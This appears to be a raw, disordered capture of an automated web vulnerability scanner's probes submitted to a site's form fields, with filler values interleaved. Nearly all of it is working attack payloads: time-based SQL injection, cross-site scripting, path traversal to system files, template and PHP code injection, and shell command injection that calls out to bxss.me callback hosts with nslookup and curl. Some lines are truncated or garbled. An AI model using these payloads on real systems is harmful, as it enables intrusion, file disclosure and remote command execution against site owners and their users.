'.gethostbyname(lc('hitcc'.'qvxmgkincd89a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(111).chr(65).'

1spCh0ntO

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

./555

Mr.

../555

Mr.

555

bxss.me

555

c:/windows/win.ini

555

/etc/shells

555

Mr.

file:///etc/passwd

http://bxss.me/t/fit.txt%3F.

555

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

Http://bxss.me/t/fit.txt

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

Mr.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

Mr.

555

'.print(md5(31337)).'

555

Mr.

555

${@print(md5(31337))}\

555

Mr.

555

Mr.

555

${@print(md5(31337))}

555

Mr.

555

Mr.

555

";print(md5(31337));$a="

555

Mr.

555

';print(md5(31337));$a='

555

Mr.

555

Mr.

555

Mr.

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

Mr.

555

Mr.

555

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

Mr.

555

Mr.

555

"+"A".concat(70-3).concat(22*4).concat(97).concat(72).concat(117).concat(74)+(require"socket"

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(105).concat(71).concat(112).concat(72)+(require'socket'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(69).concat(114).concat(71)+(require"socket"

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitsi"."hliqvaic8ecae.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(77).chr(115).chr(76)."

555

".gethostbyname(lc("hitsi"."hliqvaic8ecae.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(77).chr(115).chr(76)."

555

'.gethostbyname(lc('hitvb'.'febxtyaje5204.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(75).chr(112).chr(74).'

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

".gethostbyname(lc("hitgx"."iuufaxmy9c1b3.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(80).chr(118).chr(72)."

Mr.

555

Mr.

555

Mr.

'.gethostbyname(lc('hitqj'.'hiqtgefxac7fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(73).chr(104).chr(71).'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

@@jsJFM

��%2527%2522\'\"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1RhMzTyQp')) OR 358=(SELECT 358 FROM PG_SLEEP(15))--

1i5ygKsrB') OR 90=(SELECT 90 FROM PG_SLEEP(15))--

11tsN9ILv' OR 971=(SELECT 971 FROM PG_SLEEP(15))--

1-1)) OR 488=(SELECT 488 FROM PG_SLEEP(15))--

1-1) OR 868=(SELECT 868 FROM PG_SLEEP(15))--

1-1 OR 94=(SELECT 94 FROM PG_SLEEP(15))--

1PTPTDViT')); waitfor delay '0:0:15' --

18gx3T0ZT'); waitfor delay '0:0:15' --

1smwUwEqP'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1*if(now()=sysdate(),sleep(15),0)

-1" OR 3*2>(0+5+191-191) --

-1" OR 3*2<(0+5+191-191) --

-1" OR 3+191-191-1=0+0+0+1 --

-1" OR 2+191-191-1=0+0+0+1 --

-1' OR 3*2>(0+5+90-90) or 'HqWK70BS'='

-1' OR 3*2<(0+5+90-90) or 'HqWK70BS'='

-1' OR 3+90-90-1=0+0+0+1 or 'HqWK70BS'='

-1' OR 2+90-90-1=0+0+0+1 or 'HqWK70BS'='

-1' OR 3*2>(0+5+257-257) --

-1' OR 3*2<(0+5+257-257) --

-1' OR 3+257-257-1=0+0+0+1 --

-1' OR 2+257-257-1=0+0+0+1 --

-1 OR 3*2>(0+5+553-553)

-1 OR 3*2<(0+5+553-553)

-1 OR 3+553-553-1=0+0+0+1

-1 OR 2+553-553-1=0+0+0+1

-1 OR 3*2>(0+5+733-733) --

-1 OR 3*2<(0+5+733-733) --

-1 OR 3+733-733-1=0+0+0+1 --

-1 OR 2+733-733-1=0+0+0+1 --

1<aHMWhMt<

1<img sRc='http://attacker-9644/log.php?

1<aZj1MeT x=9988>

1<ifRAme sRc=9667.com></IfRamE>

1<W6PFDQ>UJ73P[!+!]</W6PFDQ>

1GPTQd

1}body{zzz:Expre/**/SSion(VOPb(9146))}

1<avacARf<

1<img sRc='http://attacker-9416/log.php?

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<aRn8TSm x=9206>

1<input autofocus onfocus=VOPb(9003)>

1<ifRAme sRc=9453.com></IfRamE>

�<img zzz onmouseover=VOPb(93701) //�>

1<ScRiPt>VOPb(9081)</sCripT>

1<WECH6Q>LVGTO[!+!]</WECH6Q>

1\u003CScRiPt\VOPb(9578)\u003C/sCripT\u003E

1vBbrN

%31%3C%53%63%52%69%50%74%20%3E%56%4F%50%62%289261%29%3C%2F%73%43%72%69%70%54%3E

Mr.

555

1}body{zzz:Expre/**/SSion(ZDFU(9699))}

1<img/src=">" onerror=alert(9387)>

1<img src=xyz OnErRor=VOPb(9768)>

1<img src=//xss.bxss.me/t/dot.gif onload=VOPb(9430)>

1<input autofocus onfocus=ZDFU(9085)>

1<body onload=VOPb(9140)>

�<img zzz onmouseover=ZDFU(99971) //�>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9801'>

1<ScRiPt>ZDFU(9648)</sCripT>

1<isindex type=image src=1 onerror=VOPb(9560)>

1\u003CScRiPt\ZDFU(9122)\u003C/sCripT\u003E

1<svg

%31%3C%53%63%52%69%50%74%20%3E%5A%44%46%55%289300%29%3C%2F%73%43%72%69%70%54%3E

1<InvalidTag

1<img/src=">" onerror=alert(9031)>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9064></ScRiPt>

1<img src=xyz OnErRor=ZDFU(9734)>

1<InvalidTag

1<img src=//xss.bxss.me/t/dot.gif onload=ZDFU(9126)>

1<body onload=ZDFU(9216)>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%4F%50%62%28%39%39%38%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>VOPb(9250)</script>9250

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9882'>

1<InvalidTag>VOPb(9478)</script>

1<isindex type=image src=1 onerror=ZDFU(9061)>

1<W5TD7C>R1TJR[!+!]</W5TD7C>

1<InvalidTag >VOPb(9865)</ScRiPt>

1<svg

� onload=ZDFU(9160);>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag

>ZDFU(9688)</ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9393></ScRiPt>

dfb${98991*97996}::.x

1<InvalidTag

>ZDFU(9280)</ScRiPt>

dfb[[${98991*97996}]]xca

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%5A%44%46%55%28%39%32%38%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

dfb{{98991*97996}}xca

1<InvalidTag>ZDFU(9985)</script>9985

1<InvalidTag>ZDFU(9697)</script>

1<WE7QJF>QF0MW[!+!]</WE7QJF>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

1<InvalidTag >ZDFU(9043)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

bfgx8571%C0%BEz1%C0%BCz2a%90bcxhjl8571

dfb{{98991*97996}}xca

bfg5390%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5390

19754036

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

'"()&%<zzz><InvalidTag >VOPb(9476)</ScRiPt>

1'"()&%<zzz><InvalidTag >VOPb(9024)</ScRiPt>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx4605%C0%BEz1%C0%BCz2a%90bcxhjl4605

bfg2428%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2428

19544648

'"()&%<zzz><InvalidTag >ZDFU(9139)</ScRiPt>

1'"()&%<zzz><InvalidTag >ZDFU(9703)</ScRiPt>

@@EXUHK

��%2527%2522\'\"

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1w1Vyx4Jp')) OR 562=(SELECT 562 FROM PG_SLEEP(15))--

1DrEUL8Tx') OR 583=(SELECT 583 FROM PG_SLEEP(15))--

1dzrIZNFr' OR 735=(SELECT 735 FROM PG_SLEEP(15))--

1-1)) OR 687=(SELECT 687 FROM PG_SLEEP(15))--

1-1) OR 842=(SELECT 842 FROM PG_SLEEP(15))--

1-1 OR 122=(SELECT 122 FROM PG_SLEEP(15))--

1nwNwA1pZ')); waitfor delay '0:0:15' --

1YwTTS4nv'); waitfor delay '0:0:15' --

19Ilc0qI5'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:7.729' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1<aVlrrvI<

1<img sRc='http://attacker-9783/log.php?

1<aTjh3Iw x=9576>

1<ifRAme sRc=9712.com></IfRamE>

1<WJJTIY>FPK0F[!+!]</WJJTIY>

1NeTCl

1}body{zzz:Expre/**/SSion(skXf(9901))}

1-1; waitfor delay '0:0:15' --

1<input autofocus onfocus=skXf(9992)>

�<img zzz onmouseover=skXf(96851) //�>

1<ScRiPt>skXf(9340)</sCripT>

1\u003CScRiPt\skXf(9957)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%73%6B%58%66%289781%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9318)>

1<img src=xyz OnErRor=skXf(9128)>

1<img src=//xss.bxss.me/t/dot.gif onload=skXf(9121)>

1<body onload=skXf(9394)>

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9603'>

WEB-INF\web.xml

1<isindex type=image src=1 onerror=skXf(9184)>

WEB-INF/web.xml

1<svg

� onload=skXf(9272);>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<InvalidTag

>skXf(9744)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9097></ScRiPt>

1<InvalidTag

>skXf(9049)</ScRiPt>

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%73%6B%58%66%28%39%36%31%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1<InvalidTag>skXf(9306)</script>9306

/../../../../../../../../../../boot.ini

1<InvalidTag>skXf(9492)</script>

../../../../../../../../../../windows/win.ini%00.jpg

1<WXPBWJ>9TPGX[!+!]</WXPBWJ>

C:\WINDOWS\system32\drivers\etc\hosts

file:///etc/passwd

1<InvalidTag >skXf(9495)</ScRiPt>

../../../../../../../../../../../../../../windows/win.ini

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

../../../../../../../../../../../../../../etc/passwd

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

;(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)|(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)&(nslookup -q=cname hitbtlqdpwput3b311.bxss.me||curl hitbtlqdpwput3b311.bxss.me)

dfb{{98991*97996}}xca

`(nslookup -q=cname hitwrreppuwznb99e5.bxss.me||curl hitwrreppuwznb99e5.bxss.me)`

bxss.me

|(nslookup -q=cname hitdlnpcmhjhcca67b.bxss.me||curl hitdlnpcmhjhcca67b.bxss.me)

c:/windows/win.ini

&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&'\"`0&(nslookup -q=cname hitdqwmwsvomc80983.bxss.me||curl hitdqwmwsvomc80983.bxss.me)&`'

&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&'\"`0&nslookup -q=cname hittnkgorxiosf09e7.bxss.me&`'

/etc/shells

$(nslookup -q=cname hitzcrxqgxqkc87e71.bxss.me||curl hitzcrxqgxqkc87e71.bxss.me)

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

(nslookup -q=cname hitzzvoydgeubadc8f.bxss.me||curl hitzzvoydgeubadc8f.bxss.me))

http://bxss.me/t/fit.txt%3F.jpg

|echo ghcmwc$()\ fdrvzu\nz^xyu||a #' |echo ghcmwc$()\ fdrvzu\nz^xyu||a #|" |echo ghcmwc$()\ fdrvzu\nz^xyu||a #

Http://bxss.me/t/fit.txt

&echo nphgur$()\ dwtxcs\nz^xyu||a #' &echo nphgur$()\ dwtxcs\nz^xyu||a #|" &echo nphgur$()\ dwtxcs\nz^xyu||a #

echo ixbxrn$()\ yikqln\nz^xyu||a #' &echo ixbxrn$()\ yikqln\nz^xyu||a #|" &echo ixbxrn$()\ yikqln\nz^xyu||a #

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

<th:t="${dfb}#foreach

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

1*if(now()=sysdate(),sleep(15),0)

<%={{={@{#{${dfb}}%>

bfgx4076%C0%BEz1%C0%BCz2a%90bcxhjl4076

bfg5358%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl5358

19663720

/\xfs.bxss.me?hkbakels.com.hk

'"()&%<zzz><InvalidTag >skXf(9513)</ScRiPt>

<!--

//xfs.bxss.me?hkbakels.com.hk

1'"()&%<zzz><InvalidTag >skXf(9864)</ScRiPt>

xfs.bxss.me?hkbakels.com.hk

http://xfs.bxss.me?hkbakels.com.hk

992339

xfs.bxss.me

-1" OR 3+11-11-1=0+0+0+1 --

-1" OR 2+11-11-1=0+0+0+1 --

-1' OR 3*2>(0+5+40-40) or 'sHKT5KqI'='

-1' OR 3*2<(0+5+40-40) or 'sHKT5KqI'='

"+response.write(9861255*9591349)+"

-1' OR 3+40-40-1=0+0+0+1 or 'sHKT5KqI'='

'+response.write(9861255*9591349)+'

response.write(9861255*9591349)

19900370

/\xfs.bxss.me?hkbakels.com.hk

-1' OR 2+40-40-1=0+0+0+1 or 'sHKT5KqI'='

'+'A'.concat(70-3).concat(22*4).concat(122).concat(83).concat(97).concat(80)+(require'socket'

Socket.gethostbyname('hitos'+'eadopghp2543f.bxss.me.')[3].to_s)+'

'"()&%<zzz><InvalidTag >skXf(9371)</ScRiPt>

//xfs.bxss.me?hkbakels.com.hk

-1' OR 3*2>(0+5+349-349) --

"+"A".concat(70-3).concat(22*4).concat(119).concat(70).concat(113).concat(66)+(require"socket"

Socket.gethostbyname("hitle"+"hnqpeeid8d313.bxss.me.")[3].to_s)+"

<!--

1'"()&%<zzz><InvalidTag >skXf(9180)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1' OR 3*2<(0+5+349-349) --

'"

xfs.bxss.me?hkbakels.com.hk

bxss.me/t/xss.html?%00

-1' OR 3+349-349-1=0+0+0+1 --

-1' OR 2+349-349-1=0+0+0+1 --

http://xfs.bxss.me?hkbakels.com.hk

938703

HttP://bxss.me/t/xss.html?%00

xfs.bxss.me

-1 OR 3+684-684-1=0+0+0+1

-1 OR 2+684-684-1=0+0+0+1

'+'A'.concat(70-3).concat(22*4).concat(103).concat(85).concat(103).concat(90)+(require'socket'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

bxss.me

"||sleep(27*1000)*totlzc||"

c:/windows/win.ini

${9999625+10000479}

-1 OR 3*2<(0+5+210-210) --

'||sleep(27*1000)*rafyke||'

"+"A".concat(70-3).concat(22*4).concat(106).concat(89).concat(97).concat(84)+(require"socket"

bxss.me/t/xss.html?%00

'.print(md5(31337)).'

HttP://bxss.me/t/xss.html?%00

-1 OR 3+210-210-1=0+0+0+1 --

WEB-INF\web.xml

${@print(md5(31337))}\

/etc/shells

http://bxss.me/t/fit.txt%3F.jpg

"&&sleep(27*1000)*cadepp&&"

"+response.write(9817628*9295121)+"

WEB-INF/web.xml

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

'&&sleep(27*1000)*jrrqdo&&'

Http://bxss.me/t/fit.txt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${@print(md5(31337))}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1 OR 2+210-210-1=0+0+0+1 --

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

'"()

";print(md5(31337));$a="

'+response.write(9817628*9295121)+'

response.write(9817628*9295121)

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

';print(md5(31337));$a='

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

;(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)|(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)&(nslookup -q=cname hitfztwogggai2ff58.bxss.me||curl hitfztwogggai2ff58.bxss.me)

<esi:include src="http://bxss.me/rpb.png"/>

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

`(nslookup -q=cname hitkawnnbpifx1b7b4.bxss.me||curl hitkawnnbpifx1b7b4.bxss.me)`

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

${10000293+9999661}

|(nslookup -q=cname hitaecygdqrda6d518.bxss.me||curl hitaecygdqrda6d518.bxss.me)

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&'\"`0&(nslookup -q=cname hittmttqzvsxae3a66.bxss.me||curl hittmttqzvsxae3a66.bxss.me)&`'

<esi:include src="http://bxss.me/rpb.png"/>

&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&'\"`0&nslookup -q=cname hitemexkabmkf5b76a.bxss.me&`'

/../../../../../../../../../../boot.ini

TYstbF4f

../../../../../../../../../../windows/win.ini%00.jpg

$(nslookup -q=cname hitravdnnljju945dd.bxss.me||curl hitravdnnljju945dd.bxss.me)

C:\WINDOWS\system32\drivers\etc\hosts

